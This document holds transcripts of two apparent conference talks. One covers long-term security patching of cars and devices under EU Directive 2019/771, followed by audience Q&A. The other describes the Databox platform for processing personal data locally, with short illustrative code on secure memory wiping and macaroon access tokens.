Well, a number of big car companies, including in this country, were taking the view two years ago that they wanted people to scrap their cars after six years and buy a new one. Hey, it makes business sense, doesn't it? If you're Mr. Mercedes, your business model is: if the customer is rich, you sell him a three-year lease on a new car. And if the customer is not quite so rich, you sell him a three-year lease on a Mercedes-approved used car. And if somebody drives a seven-year-old Mercedes, that's thought crime. So they should emigrate to Africa or something. So this was the view of the vehicle makers. But here's the rub. The embedded CO2 cost of a car often exceeds its lifetime fuel burn. The best estimate for the embedded CO2 cost of an E-Class Merc is 35 tons. So go and work out how many liters per 100 kilometers and how many kilometers it's going to run in 15 years. You come to the conclusion that if you get a six-year lifetime, then maybe you are decreasing the range of the car from 300,000 kilometers to 100,000 kilometers. And so you're approximately doubling the overall CO2 emissions, taking the whole life cycle. Not just the Scope 1, but the Scope 2 and the Scope 3, the embedded stuff as well. And then there are other consequences. What about Africa, where most vehicles are imported second hand? If you go to Nairobi, all the cars are between 10 and 20 years old. They arrive in the docks in Mombasa when they're already 10 years old, and people drive them for 10 years, and then they end up in Uganda or Chad or somewhere like that, and they're repaired for as long as they're repairable. What's going to happen to road transport in Africa if all of a sudden there's a software time bomb that causes cars to self-destruct 10 years after they leave the showroom? And if there isn't, what about safety? I don't know what the rules are here, but in Britain, I have to get my car through a safety examination every year once it's more than three years old. And it's entirely foreseeable that within two or three years, the mechanic will want to check that the software is up to date. So once the software update is no longer available, that's basically saying this car must now be exported or scrapped. I couldn't resist the temptation to put in a cartoon. My engine's making a weird noise. Can you take a look? Sure, just pop the hood. Ah, the hood latch is also broken. Okay, just pull up to that big pit and push the car in, and we'll go get a new one. Right? This is what happens if we start treating cars the way we treat consumer electronics. So what's a reasonable design lifetime? Well, with cars, the way it's going is maybe 18 years, say 10 years from the sale of the last product in a model range. Domestic appliances: 10 years because of the spares obligation, plus shelf life, say 15. Medical devices: if a pacemaker lasts for 10 years, then maybe you need 20 years. Electricity substations even more. So from the point of view of engineers, the question is how can you see to it that your software will be patchable for 20 years? So as we put in the abstract, if you are writing software now for a car that will go on sale in 2023, what sort of languages, what sort of tool chain should you use, what sort of crypto should you use, so that you're sure you'll still be able to patch that software in 2043? And that isn't just about the languages and compilers and linkers and so on. That's about the whole ecosystem. So what did the EU do?
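As a brief aside, here is the rough arithmetic behind the claim above that shortening a car's life from fifteen years to six roughly doubles its overall CO2 per kilometre. The fuel figures are assumptions for illustration only (about 6 litres of diesel per 100 km, roughly 2.6 kg of CO2 per litre); the 35-tonne embedded figure is the one quoted above.

\[
\frac{35{,}000\,\mathrm{kg} + 300{,}000\,\mathrm{km}\times 0.06\,\mathrm{L/km}\times 2.6\,\mathrm{kg/L}}{300{,}000\,\mathrm{km}} \approx 0.27\,\mathrm{kg\ CO_2/km}
\qquad
\frac{35{,}000\,\mathrm{kg} + 100{,}000\,\mathrm{km}\times 0.06\,\mathrm{L/km}\times 2.6\,\mathrm{kg/L}}{100{,}000\,\mathrm{km}} \approx 0.51\,\mathrm{kg\ CO_2/km}
\]

On these assumed numbers the per-kilometre total nearly doubles, because the 35 tonnes of embedded CO2 is spread over a third as many kilometres.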
Well, I'm pleased to say that at the third attempt, the EU managed to get some law through on this. Directive 2019/771, passed this year on smart goods, says that buyers of goods with digital elements are entitled to necessary updates for two years, or for a longer period of time if this is a reasonable expectation of the customer. This is what they managed to get through the parliament. And what we expect is that this will mean at least 10 years for cars, ovens, fridges, air conditioning and so on, because of existing provisions about physical spares. But what's more, the trader has got the burden of proof in the first couple of years if there are disputes. So there's now the legal framework there to create the demand for long-term patching of software. And now it's kind of up to us. If the durable goods we're designing today are still working in 2039, then a whole bunch of things are going to have to change. Computer science has always been about managing complexity, ever since the very first high-level languages. And the history goes on from there through types and objects and tools like Git and Jenkins and Coverity. So here's a question for the computer scientists here. What else is going to be needed for sustainable computing once we have software in just about everything? So research topics to support 20-year patching include a more stable and powerful tool chain. We know how complex this can be from crypto, looking at the history of the last 20 years of TLS. Cars teach that it's difficult and expensive to sustain all the different test environments you have for different models of cars. Control systems teach that maybe you can make small changes to the architecture which will then limit what you have to patch. And, as I said, how do you go about motivating OEMs to patch products that they no longer sell? In this case, it's European law, but there are maybe other things you can do too. What does it mean for those of us who teach and research in universities? Well, since 2016, I've been teaching safety and security together in the same course to first-year undergraduates, because presenting these ideas together in lockstep will help people to think in more unified terms about how it all holds together. In research terms, we've been starting to look at what we can do to make the tool chain more sustainable. For example, one of the problems that you have if you maintain crypto software is that every so often, the compiler writer gets a little bit smarter and the compiler figures out that these extra padding instructions that you put in to make the loops of your crypto routines run in constant time, and to scrub the contents of round keys once they are no longer in use, are not doing any real work, and it removes them. All of a sudden, from one day to the next, you find that your crypto has sprung a huge big timing leak, and then you have to rush to get somebody out of bed to fix the tool chain. One of the things that we thought is that better ways for programmers to communicate intent might help. There's a paper by Laurent Simon, David Chisnall and me where we looked at zeroizing sensitive variables and doing constant-time loops with a plug-in for LLVM. That led to a EuroS&P paper a year and a half ago, What You Get Is What You C, and there's a plug-in that you can download and play with. Macroscale sustainable security is going to require a lot more.
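To make the zeroisation problem just described concrete, here is a minimal C sketch (an illustration, not the LLVM plug-in from the paper). A final memset over key material is a dead store as far as the optimiser can tell, so dead-store elimination is allowed to delete it; one common portable workaround is to route the wipe through a volatile function pointer, and platform-specific alternatives such as explicit_bzero or memset_s exist for the same purpose.

#include <stddef.h>
#include <string.h>

/* Stand-in for a real key schedule: the only point is that round_keys
 * holds sensitive material that should be wiped before returning. */
static void expand_key(const unsigned char master[16], unsigned char out[16])
{
    unsigned char round_keys[176];
    for (size_t i = 0; i < sizeof round_keys; i++)
        round_keys[i] = master[i % 16] ^ (unsigned char)i;
    memcpy(out, round_keys, 16);

    /* Dead-store elimination may delete this: round_keys is about to go
     * out of scope, so the compiler sees no observable effect. */
    memset(round_keys, 0, sizeof round_keys);
}

/* Workaround: call memset through a volatile function pointer, so the
 * compiler must assume the call has effects it cannot reason away. */
static void *(*const volatile memset_ptr)(void *, int, size_t) = memset;

static void secure_wipe(void *p, size_t n)
{
    memset_ptr(p, 0, n);
}

int main(void)
{
    unsigned char master[16] = {0}, out[16];
    expand_key(master, out);
    secure_wipe(out, sizeof out);
    return 0;
}

The wider point for 20-year patching is that a fix like this is really a contract with the toolchain: it works because of how today's compilers reason about side effects, which is exactly the sort of assumption that has to keep holding for the whole life of the product.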
Despite the problems in the aerospace industry with the 737 Max, the aerospace industry still has got a better feedback loop of learning from incidents and accidents, and we don't have that yet in any of the fields like cars and so on where it's going to be needed. What can we use as a guide? Security economics is one set of intellectual tools that can be applied. We've known for almost 20 years now that complex socio-technical systems often fail because of poor incentives. If Alice guards a system and Bob pays the cost of failure, you can expect trouble. Security economics researchers can explain platform security problems, patching cycles, liability games and so on. The same principles apply to safety and will become even more important as safety and security become entangled. Also we'll get even more data and we'll be able to do more research and get more insights from the data. So where does this lead? Well, our papers on making security sustainable and the thing that we did for the EU on standardization and certification in the Internet of Things are on my web page, together with other relevant papers on topics around sustainability, from smart metering to pushing back on wildlife crime. So that's the first place to go if you're interested in this stuff, and there's also our blog. And if you're interested in these kinds of issues at the interface between technology and policy, of how incentives work and how they very often fail when it comes to complex socio-technical systems, then the Workshop on the Economics of Information Security, in Brussels next June, is the place where academics interested in these topics tend to meet up. So perhaps we'll see a few of you there in June. And with that, there's a book on security engineering which goes over some of these things. And there's a third edition in the pipeline. Thank you very much, Ross Anderson, for the talk. We will start the Q&A session a little bit differently than you're used to. Ross has a question to you. So he told me there will be a third edition of his book and he's not yet sure about the cover he wants to have. So you're going to choose. And so that the people on the stream also can hear your choice, I would like you to make a humming noise for the cover which you like more. You will first see both covers. Cover one and cover two. So who of you would like to pick the first cover? Come on. And the second choice. Okay. I think we have a clear favorite here from the audience. So it would be the second cover. Thanks. And we will look forward to seeing this cover next year then. So if you now have questions yourself, you can line up in front of the microphones. You will find eight distributed in the hall, three in the middle, two on the sides. The signal angel has the first question from the Internet. The first question is, is there a reason why you didn't include aviation in your research? We were asked to choose three fields and the three fields I chose were the ones in which we had worked most recently. I did some work in avionics but that was 40 years ago, so I'm no longer current. All right. A question for microphone number two please. Hi. Thanks for your talk. What I'm wondering most about is where do you believe the balance will fall in the fight between privacy, the want of the manufacturer to prove that it wasn't their fault, and the right to repair? Well, this is an immensely complex question and it's one that we'll be fighting about for the next 20 years.
But all I can suggest is that we study the problems in detail, that we collect the data that we need to say coherent things to policy makers, and that we use the intellectual tools that we have, such as the economics of security, in order to inform these arguments. That's the best way that we can fight these fights, by being clear-headed and by being informed. Thank you. A question for microphone number four please. Can you switch on microphone number four? Oh, sorry, hello, thank you for the talk. As a software engineer, arguably I can cause much more damage than a single medical professional, simply because of the multiplication of my work. Why is it that there is still no conversation about software engineers carrying liability insurance and being liable for the work they do? Well, that again is a complex question, and there are some countries like Canada where being a professional engineer gives you particular status. I think it's cultural as much as anything else, because our trade has always been freewheeling, it's always been growing very quickly, and throughout my lifetime it's been sucking up a fair proportion of science graduates. If you were to restrict software engineering to people with degrees in computer science then we would have an awful lot fewer people. I wouldn't be here, for example, because my first degree was in pure maths. Alright, a question for microphone number one please. Hi, thank you for the talk. My question is also about aviation, because as I understand it, a lot of the old or retired aircraft and other equipment is dumped into the so-called developing countries, and with the modern technology and the modern aircraft, the issue of maintenance or software patching would still be in question. But how do we see that rolling out also for the so-called third world countries? Because I am a Pakistani journalist and this worries me a lot, because we get so many devices dumped into Pakistan after they are retired and people just use them. I mean it's a country that cannot even afford a licensed operating system, so maybe you could shed some light on that. Thank you. Well, there are some positive things that can be done. Development IT is something in which we are engaged and you can find the details on my website, but good things don't necessarily have to involve IT. One of my school friends became an anaesthetist and after he retired he devoted his energies to developing an infusion pump for use in less developed countries which is very much cheaper than the ones that we saw on the screen there, and it's also safe, rugged, reliable and designed for use in places like Pakistan and Africa and South America. So the appropriate technology doesn't always have to be the whizziest, right? And if you've got very bad roads in India and Africa and relatively cheap labor, then perhaps autonomous cars should not be a priority. Thank you. Alright, we have another question from the internet, the signal angel please. Why force updates by law? Wouldn't it be better to prohibit the important things from accessing the internet by law? Well, politics is the art of the possible, and you can only realistically talk about a certain number of things at any one time in any political culture, the so-called Overton window. Now if you talked about banning technology, banning cars that connect to the internet, as a minister you would be immediately shouted out of office as being a Luddite, right? So it's just not possible to go down that path.
What is possible is to go down the path of saying, look, if you've got a company that imports lots of dangerous toys that harm kids, or dangerous CCTV cameras that get recruited into a botnet, then if you don't meet European regulations we'll put the containers on the boat back to China. That is something that can be solved politically. And given the weakness of the car industry after the emissions scandal, it was possible for Brussels to push through something that the car industry really didn't like. And even then, that was the third attempt to do something about it. So again, it's what you can practically achieve in real-world politics. All right, we have more questions. Microphone number four please. Hi, I'm an automotive cybersecurity analyst and embedded software engineer. I'm also part of the SAE ISO 21434 automotive cybersecurity standard. Are you aware of the standard that's coming out next year, hopefully? I've not done any significant work with it. Sometimes the motor industry have talked about it, but it's not something we've engaged with in any detail. Okay, I guess my point is not so much of a question but a little bit of a pushback. A lot of the things you talked about are being worked on and are being considered. Over-the-air updating is going to be mandated. A 30-, 40-year life cycle of the vehicle is being considered by engineers. Nobody I know talks about a six-year life cycle. Back in the 80s maybe we talked about planned obsolescence, but that's just not a thing. So I'm not really sure where that language is coming from, to be honest with you. Well, I've been to closed motor industry conferences where senior executives have been talking about just that in terms of autonomous vehicles. So yeah, it's something that we've had to disabuse them of. Alright, so time is unfortunately up, but I think Ross will be available after the talk as well for questions. So you can meet him here on the side. Please give a huge round of applause for Ross Anderson. Thanks. And thank you for choosing the cover.
What sort of tools and methodologies should you use to write software for a car that will go on sale in 2023, if you have to support security patches and safety upgrades till 2043? Now that we’re putting software and network connections into cars and medical devices, we’ll have to patch vulnerabilities, as we do with phones. But we can't let vendors stop patching them after three years, as they do with phones. So in May, the EU passed Directive 2019/771 on the sale of goods. This gives consumers the right to software updates for goods with digital elements, for the time period the consumer might reasonably expect. In this talk I'll describe the background, including a study we did for the European Commission in 2016, and the likely future effects. As sustainable safety, security and privacy become a legal mandate, this will create real tension with existing business models and supply chains. It will also pose a grand challenge for computer scientists.
10.5446/53132 (DOI)
The following talk is something really really cool I think. I'm really looking forward to it and to get a glimpse of what it's all about. The talk is about a research project which lets the user see and control what's done with their personal data. At least that's what I read in the description of the talk. I'm really really looking forward to hearing some more details about this from Mort, who is presenting this talk, and he's going to be talking about the platform design, about the implementation and the current status of this Databox thing. Please give a really warm round of applause to Mort. Thank you for having me. Before I start I shall begin by apologising. I have small kids so it's permanently flu season in my house. If I start coughing uncontrollably, just bear with me. What I'm going to do is talk a bit about the Databox project. This is a project that was funded by the UK Research Council EPSRC. It's a collaboration between the University of Cambridge, Imperial College London and the University of Nottingham with a number of industrial partners, one of whom I'll mention in the talk, the BBC. To set the scene a little bit, I probably don't need to say this very much at this particular venue. You may just wish to go to those Tumblr sites which I thought were quite funny, Big Data Pix and We Put A Chip In It. We're now in a big data world. Data is collected all around us in the environment, from what we do, our retail habits, sensing IoT things in our homes; all around us data is being collected. There's a lot of opportunities and challenges that are presented by this. You can imagine a great deal of personalisation, personal optimisation, things you can do to make your house more energy efficient, for example. There's lots of things you can do that are beneficial from this sort of data. There's also a lot of challenges that are presented, particularly around privacy, around the rights of the individual to control and see what's happening about them. I did warn you, sorry. The nature of this sort of collection is that it's building up large collections of very rich, often quite intimate data in large silos. Some of the sensors that you can see on the top left there, you've got sort of things you might expect, regular social networks, Nest thermostats, but nowadays more intrusive things, medical devices, things that are monitoring insulin levels, heart rate, so forth. It's very rich, it's very intimate data that's now possible to be collected. The challenge that we posed ourselves in this research project was really what can we do to allow data subjects to control the collection and exploitation of data, particularly data that is what you might think of as their data, so data that's yours that you somehow own, and also data that's collected about you that you might not have such direct control over. So that's the context. How to enable data subjects to control collection and exploitation of their data and data about them. This is taking place in an existing ecosystem, which is very much focused around the idea that we want to move data around. Typically, we want to move data into the cloud. Data tends to get pushed out there. Even when it starts out, there's some data where you might expect it starts in the cloud. So you post something to Facebook, it's on Facebook's computers, that's not a surprise. On the other hand, there's a lot of sort of IoT devices that you might think could very well keep the data more local to where they're deployed.
You might think that data about your house could stay in your house if that's what you wanted to happen. And yet by default, a lot of them will push that data out to the cloud, even if they subsequently give you back in some way, it will end up out there on somebody else's computer. And this seems to be, to my mind anyway, it's a structural problem about the way that we build systems nowadays. The internet has become very fragmented. It's difficult to build effective, robust, efficient distributed systems across the modern internet. And it's much easier just to centralize things. And the cloud allows us to centralize things. We can stick it all out there in some system that somebody else runs, as the sticker says, on somebody else's computer. So we're defaulting to moving data into the cloud in order to process it. It makes the processing much easier as well, if that data is centralized. The starting point for thinking about this was when I rejoined academia in about 2009 and joined a research institute at Nottingham called Horizon, Horizon Digital Economy Research. That was focused very much around this notion of digital footprint and what could we do with these digital footprints that we're creating or we're starting to create at that point. Now it was quite interdisciplinary center, so there were people there from sociology, mathematics, engineering, computer science, from all over the piece. And a lot of my colleagues essentially said, if you could build as a magic context service, we should do great things with it. We just know the context of the user, then we'll be able to do all sorts of fun and interesting interactions. And we had a number of discussions about this, where my response would often be, well, yes, but what is that? I don't know what a context, I don't really know what the context of the user is. What do you mean when you say you want to know the context of the user? And it eventually became clear that it wasn't quite well defined what that was, but it definitely involved using personal data. It was definitely going to be possible to construct this from the personal data that could now be collected from sensors, from social networks, from interactions. So the end point I came to with that was really being a lazy computer scientist to punt on the hard problems. So I wasn't going to try to define what the context was, because that seemed difficult. But what I did say was, well, if you give me some piece of code that encodes what you think the context is, then I'll try and create a platform that will execute that for you, and so return to you what you've defined the context to be. So I punted on the problem. And that gave rise to a thing that we called data-ware, which was essentially a service oriented architecture for trying to do personal data processing. So the idea was that the data processor would write some piece of code that would process the data subject's data, the subject would provide the platform on which they could execute that code, and the processor would receive the result. And the point here was that we were now moving the code to where the data was, rather than moving the data to where the code wished to execute on it. So we're not pushing the data into the cloud anymore, trying to take the code and push that to where the data starts. This was the sort of picture we had at the time of data-ware. So you've got a sort of, well, overly complex, certainly fairly complex request and permission process here. 
So the data processor requests permission through some mechanism, gets granted permission to do some piece of processing, and is then able to push the piece of code they want to execute onto some platform where the data is made available, and then results go back to the data processor. So that was sort of data-ware, excuse me, data-ware V1. However, when we started to try and build this and try and think about how it might be used, it became clear that there was lots of complexity in terms of the interactions you might wish to support on such a system. So there's lots of ways you can construct interaction around this. One obvious way that's received some interest is the idea that people might pay you to use your data. But there's lots of other things that you might wish to happen there. There may be many situations where you want data to be processed, but it's not appropriate for somebody to pay you. Another member of your family, it may not seem sensible for them to pay you to use your data. And there was little in the way that data-ware was constructed that actually said anything about how this was going to happen. So in the case of being paid to use data, exactly what were you being paid for? What sort of use was going to be made of your data? What was going to happen then? So data-ware was a proposal that would support some forms of interaction. It basically gave you a kind of transactional nature where you had a transaction between parties in terms of this request, grant a permission, and then possibly some ability to see what's happened afterwards. But there were a lot more things that we could consider. And so we sort of abstracted and stepped up from the problem a little bit and stepped away from data-ware and started to think more generally about what is it that's going on in this sort of system. And we coined this idea of human-data interaction with, by analogy, with human-computer interaction. So I think I'm not an either a historian or a proper HCI person. But my understanding is that HCI has essentially moved, human-computer interaction has moved as a field of study away from where it started, which was the idea of a single individual using a single computer. And it's kind of moved towards a collaboration between individuals using computers. And it's now in the sort of world where you're thinking about ubiquitous computing, where it's not necessarily obvious which the computer is you're using. And so human-data interaction tries to take that step further and say, well, in fact, it's now about the data. It's not really about the interaction with the computer anymore. It's about how you're represented in the data and what the data is used to do to you and for you. And so the very high-level model that we have here is that you have some personal data that is collected. Analytics are performed on that data. They process it in some way. And it allows you to draw some inferences to work out something about the way what that data says. And as a result of that inference process, some actions are taken. Actions might be to feedback into further analytics, feedback the inferences you've made, or actions might be nudges of things that might change your behavior and thus change the data that generates in the future. So even at this very sort of simple model, there's a couple of feedback loops that can take place. And it's in this kind of space where data processing systems and data processing computations are taking place. 
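To make the dataware idea above a little more concrete, here is a toy C sketch (my illustration, not the project's actual interface). The data processor ships a computation; the platform checks that permission has been granted, runs the computation over the subject's local data, and only the aggregate result ever goes back to the processor.

#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* A reading held locally on the data subject's platform. */
struct reading { double value; };

/* The "code" a data processor ships: a function over local data that
 * produces a single result. */
typedef double (*analysis_fn)(const struct reading *data, size_t n);

/* The platform runs the analysis only if permission was granted, and
 * only the scalar result is returned to the processor. */
static bool run_analysis(bool permission_granted, analysis_fn fn,
                         const struct reading *data, size_t n,
                         double *result_out)
{
    if (!permission_granted)
        return false;
    *result_out = fn(data, n);
    return true;
}

/* An example analysis a processor might submit: a mean. */
static double mean_value(const struct reading *data, size_t n)
{
    double sum = 0.0;
    for (size_t i = 0; i < n; i++)
        sum += data[i].value;
    return n ? sum / (double)n : 0.0;
}

int main(void)
{
    struct reading local_data[] = { {1.0}, {2.0}, {3.0} };
    double result;
    if (run_analysis(true, mean_value, local_data, 3, &result))
        printf("released result: %.2f\n", result);  /* only this leaves */
    return 0;
}

The code moves to the data rather than the data moving to the code, which is the point being made here; everything about what counts as a legitimate request, and what the subject gets to see afterwards, still has to be layered on top.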
And we felt that the systems that we were seeing, and the systems that at that point we were trying to build, were lacking in three key aspects which underpin this idea of human-data interaction, or HDI. The first was legibility. It's clear that most people, I think, most of the time, are generally unaware of what the sources of data that might be collected about them are, where the data can come from; generally unaware of the analyses that might be performed on those data; and generally unaware of what the implications of those analyses are. So understanding what's going to happen to you in the future on the basis of actions you've taken now or in the past, actions that are now represented in some data set somewhere, possibly with some degree of inaccuracy, is not necessarily clear. It's not legible. It's not easy to see and understand what's happening in these systems. The second thing that seemed to be missing was agency. Agency is the capacity to act in a system. We are often unaware, certainly I think I am unaware, I can't speak for anybody else, of the means that I have to affect the data that's being collected about me. There are some things I think I can do to try and control what data is collected: I can block cookies in my browser, I can use Brave, I can turn on all the privacy things. But that only controls the data that's collected about me to some extent. It might be much less clear to me how I can affect this as I move around a smart city environment or a smart environment, for example. It's not always obvious to me what I can do to affect the analyses that are being performed on those data that have been collected about me. And in both of these cases, that's even if I know that these means to affect things exist at all and I can be bothered to employ them, because it may well be complex or difficult to employ them effectively. So we lack agency; we lack the capacity to act. And then the third thing seemed to be what is a rather ugly word, negotiability. This is essentially trying to capture the notion of supporting the dynamics of interaction: the idea that when you make a decision, it doesn't necessarily remain your decision in this system forevermore. You might wish to change your view on things. You might wish to change the way that you interact with the system, either as you learn more about it, or as your behavior changes, or as your environment changes for whatever reason. Current systems still tend to deal in this kind of binary terms of service: you click the box and say yes, and then you're done, and you don't really get a chance to go back and revisit that. Maybe nowadays you're starting to see more and more the idea that you can at least completely withdraw from a system, so you can be in the system or out of the system. But it's often not really possible to control what's going on in terms of your interaction with the system over time. So that gave rise to this idea of Databox, which you can think of in some ways as Dataware version 2. This is still taking the idea that you want to move the code to the data. This allows you to minimize data release, and it allows you to retain more control over what's done with the data, because it's running on a device that is under your control. At the end of the day, if you really want to, you can just turn it off, and then you know that the data is not being processed anymore. We tried to pay a bit more attention to how access to data, local or remote data, was going to be mediated.
We went to some effort to try and make sure that we could control all the internal and external communication and that we could log all the IO that takes place, following the idea that I don't really care what computation you do on data about me as long as you never see any result from it. If the computation just runs on a device somewhere and then gets thrown away, has anything really happened? If the computation runs in the woods and a tree falls on the computer, did anything take place? So if I can log everything that goes on in terms of what's communicated from that device to the outside world, then in some sense, even if things go wrong, I might be able to go back after the fact and figure out what happened, what leaked, why it leaked and when it leaked. So the sort of model we have with Databox is this kind of application. This is a fraud detection application: some person called Henry downloads a bank's app onto his Databox, and later on there's a large transaction made in some foreign country against his credit card. The banking application is able to check Henry's location by asking, are you located in the country where this transaction took place? The Databox is able to say no, and then the bank can deny the transaction, and so the fraud is prevented. This hasn't revealed to the bank where this individual called Henry is. There's been no release of that information; the box has simply been able to say no, he's not where that transaction claims he is. So this is trying to minimize the data release that takes place. So how is Databox implemented? The model here is that we're essentially installing apps that process data locally, following the app metaphor from smartphones. Apps process data; we also have a notion of a driver, which is something that either ingests or releases data. And there are manifests associated with each app, and they describe the data that's going to be accessed by that app. That will be turned into a concrete, what we've called an SLA, some of the terminology is a bit horrible, I apologize for that too, a concrete SLA when you install an app. The sort of thing that might happen there is you have an app that wants to have access to your smart light bulb data. So that's in the manifest: access to smart light bulb data. When you install it, you're able to control which light bulbs it gets access to. It can have all the downstairs light bulbs, but not the upstairs light bulbs in my house. Okay, so that's the ability for the user to exercise some control over what's actually being revealed about them and what they're happy to share, in that moment, for that application. All the components in Databox are containerized; we were using containerization as a lightweight sort of virtualization technique. This gave us a degree of platform independence, a degree of isolation between running components, and the ability to make the management of this kind of system easier, because there are quite a lot of moving parts here, and being able to manage things in a fairly homogeneous manner seemed useful. When I say platform independence there, that claim came back to bite us slightly for a couple of weeks, because it turned out we were getting bug reports from a user who was finding that things weren't working, and it took us some time to figure out that the reason was that they were running it on Windows, using the Docker for Windows tool that had come out recently.
We didn't realize at first that that was why the shell scripts weren't working: they were not in a Unix environment. The containers were running, and they could get the containers running when they did it by hand, but all the start-up scripts did not work. There are four core components to the platform. There's a thing called the container manager, a thing called the arbiter, a thing called the core network, and then many things called data stores. The container manager is the thing that manages the containers, unsurprisingly. It manages container lifecycle in particular. It's one of the things that starts up first, and after that it controls which apps are running, which drivers are running, how things are connected, and basically kicks everything off. The arbiter is the container that produces the tokens that we use for access control. The format of those tokens is a thing called a macaroon. Who's heard of macaroons? Not the biscuits; one or two. So macaroons are, to reuse the pun that the authors used, better cookies. They're essentially access control tokens that you can delegate, and you can attach constraints to them when you delegate them to other parties. The data stores provide a persistent storage facility, so we can monitor everything that's being recorded and used by each application. They also provide a middleware layer, so communication happens via these data stores; that's a ZeroMQ-based middleware layer. And each store that's created gets registered in a Hypercat catalog that exists on the Databox, and the idea is that that provides a degree of discoverability, so an application is able to find out what this Databox has and therefore whether it's going to be able to support what that application needs. And then finally, right at the center, a thing called the core network essentially tries to manage network connectivity for each application. We sort of hacked that together in the Docker world by providing a unique virtual network interface for each application, which is connected only to that application container, the data store of that application, and the core network. So we can intercept all of the communication that takes place for any application; we can make sure that we log everything, and we can make sure we prevent anything happening that we don't want to happen. As I mentioned, apps and drivers come with a manifest. This basically describes origination metadata: it says what the application is going to need in terms of data access, what its storage requirements are, and whether it's going to need to do any remote accesses, that is, whether it needs to talk to anything else on the box or anything off the box. The distinction between apps and drivers is essentially that drivers can talk to things that are not only on the Databox; they can talk to things off the Databox. That's how you get data in and out of the system. In the installation process, as I've hinted, you essentially start out with the user trying to install the application. They say, yes, you can have access to these data sources, and that causes particular tokens to be generated and given to that application, which is then connected up to the right network devices, and the containers are all then started. Those tokens that the application has been given allow it then to present those tokens to the different data stores in the system.
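To give a flavor of what those delegable tokens look like in practice, here is a minimal sketch using the pymacaroons library; the key, the identifier and the caveat strings are invented for illustration and are not the actual Databox arbiter's vocabulary.

# Rough illustration of macaroon-style access tokens (pip install pymacaroons).
# Keys, locations and caveats here are invented examples, not Databox's real ones.
from pymacaroons import Macaroon, Verifier

ARBITER_KEY = "arbiter-root-secret"   # known to the arbiter and the stores it trusts

# The arbiter mints a token for one app, scoped down with caveats.
token = Macaroon(location="databox-arbiter",
                 identifier="app=lighting-insights",
                 key=ARBITER_KEY)
token.add_first_party_caveat("store = lightbulb-store")
token.add_first_party_caveat("path = /downstairs/*")
token.add_first_party_caveat("method = GET")

# A data store checks the token before answering a read request.
v = Verifier()
v.satisfy_exact("store = lightbulb-store")
v.satisfy_exact("path = /downstairs/*")
v.satisfy_exact("method = GET")
assert v.verify(token, ARBITER_KEY)   # raises if any caveat is not satisfied

The useful property is that whoever holds a token can always add further caveats before passing it on, narrowing what it grants, but can never widen it without the arbiter's key.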
The data stores can then verify that this application has indeed been permitted by the user to access that data. So that's the mechanism for access control. I'll move fairly quickly through this in the interest of time, but this is a description of the middleware layer that we have, which is based on some standardized protocols: CoAP, running on top of ZeroMQ. We have a Git-like back end to this, so it records everything, and it supports JSON, text, and binary data. There's a degree of security that we attempt to provide, with the intent that at some point in the future we might like to distribute this across multiple devices, so you'll want to be able to secure the communication between data stores. And the main reason for doing this is that the first version we started out with was hacked together very quickly, using a straightforward HTTP REST style API in Node.js, and that was not suitable in terms of supporting relatively high-frequency sensor data or the limited memory footprint that we had on things like Raspberry Pis. This is much more effective in that sense. So what can you do with the Databox? What could you do with the Databox? Among the interactions that we can support, and that we think we should be able to support better, you can do things with a physical device that you can't do so easily with things that are in the cloud. Physical devices are often easier to reason about, because you can see them; you can simply glance at one and see what the configuration is. You can imagine situations here where, for example, we might set this up so that access to smart metering data is only going to be permitted if the green tag has been inserted into my Databox and my partner's blue tag has been inserted into my Databox, so we both agree that that data can be shared; or where the green tag is in the Databox and we're both located in the house, so we're both proximate to it. So you can set up much richer ways to control access to data. This maps quite nicely to notions of physical access control, which most people have a pretty reasonable understanding of, because we're used to doing things like locking windows and locking doors and so forth. Some of the members of the team built a thing using what's essentially a hacked-up version of IBM's Node-RED. This allowed you to assemble Databox applications by dragging and dropping data sources and computational units, linking them together, and then you could essentially click a button somewhere off the bottom of the screen, and that would take what you'd produced, build it into a container, and publish it to the app store. So building applications is fairly straightforward with this sort of environment. We also did some work on looking at richer visualizations of data. You can take an SVG image, for example, and break it up into its component parts, and then describe transformations so that as the data comes in, it animates the SVG according to the transformations you've described. I think one of the earlier demos of this had an SVG with a cartoon picture of a particular American president, and when tweets came in, that would cause parts of the face to animate according to some simple sentiment analysis of the tweets. So you can perhaps make data more legible by doing richer visualizations, making it more explicit what's happening, what's represented in the data.
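As a toy illustration of that kind of data-driven SVG animation (not the actual demo code; the element and the mapping are invented), something like the following is all that is really going on: a numeric score is turned into an attribute of one named SVG element.

# Toy sketch of data-driven SVG animation: map a sentiment score in [-1, 1]
# onto the curvature of an invented "mouth" path element.
def mouth_path(sentiment):
    s = max(-1.0, min(1.0, sentiment))   # clamp the score
    # positive sentiment curves the mouth upwards, negative downwards
    return f'<path id="mouth" d="M 10 50 Q 50 {50 - 20 * s:.0f} 90 50" stroke="black" fill="none"/>'

for score in (-0.8, 0.0, 0.9):
    print(mouth_path(score))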
This is a piece of work which unfortunately stalled, but with a PhD student I was looking at what you could do in terms of generic measures of risk. The idea is that a lot of the data sources you might see on such a device are going to be time series, time series of floating point numbers essentially: temperature readings, humidity readings, air quality readings, whatever they might be. The question we were exploring was, is it possible to take a time series like that and, treating it simply as a time series without any semantic information about what those numbers represent, just look at various measures of entropy, statistical measures, autocorrelations and so forth, to see whether or not there's in some sense risk associated with giving access to that data? How much information is contained in that time series in a statistical sense? Is it possible to say, this application is asking for access to that data at too high a frequency, it's going to be able to find out too much; whereas this other application only wants to see an average over every three months, and therefore that's fine, I don't really care what that says? The initial results were somewhat promising in this sense, and perhaps you could then start to put those results together and say, well, application A is okay and application B is okay, but they come from the same publisher, so if you install both of those applications together, you may be revealing a lot to that particular data processor. Another thing which pops straight out of this idea that we want to atomize data and push it out to all these different Databoxes is that it's now difficult to do big data analytics in the traditional way you might expect, where you put all the data into the cloud. So we have been looking a little bit at how to do small data analytics: the idea that you might do some of the computations first, while the data is still private, and only subsequently try and aggregate the data. You don't need to build up these vast data lakes of data about everything and data about everyone. Instead, you try, again, to minimize data release, do as much of the processing as you can while the data is kept private, and only later on start to aggregate results together. We had a couple of goals with this, one of which was essentially looking at pre-training models using a small, hopefully statistically representative, sample of users' data, and then taking those pre-trained models and pushing them out to lots of different locations. Then, in those individual Databoxes, you can refine those models and specialize the training to the particular individuals whose data is now being used. This gets you essentially further, faster, in terms of the accuracy of those models. The long-term goal was to think about how you would actually do machine learning, for example, or other forms of statistical analysis of data, at scale. If you've got a Databox for every house in the country, and in the UK I think it's about 30 million households, how are you going to run a computation across such a large-scale set of devices as that?
